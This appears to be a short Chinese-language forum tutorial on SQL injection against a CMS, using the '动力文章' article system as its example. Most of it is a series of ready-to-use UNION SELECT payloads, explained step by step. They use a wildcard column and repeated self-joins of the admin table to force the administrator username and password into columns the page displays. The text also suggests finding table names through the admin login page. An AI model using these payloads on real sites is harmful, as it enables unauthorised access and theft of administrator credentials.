我举动力文章的例子 他的是28个字段 加入admin表5个字段 那么union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin * 就是5个字段? 这样来爆admin里边的所有表明 但注意 * 确是代表了所有admin表的字段 如果正好比如username在可显示位置 他就会显示在页面上 我需要爆他的字段呢· 技术都有局限性 这个方法需要知道表名和一个字段名id 不需要其他字段 比如什么password username 你要问他如果不在可显示位置么 通常不知道的是表名 表段名 可以通过查找后台登陆找到 这个就要看自己的了 大家看看这个语句 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id) 这个(admin as a inner join admin as b on a.id=b.id)是admin表自连接 这样from 后面的表就会成为字段数加倍的表
前面18+2*5 = 28 个字段 就是合法的
*代表的字段就会拓宽 加大username password在可显示位置的几率
如果不在怎么办? 那么union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
如果还没成功 怎么办? union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on a.id=d.id)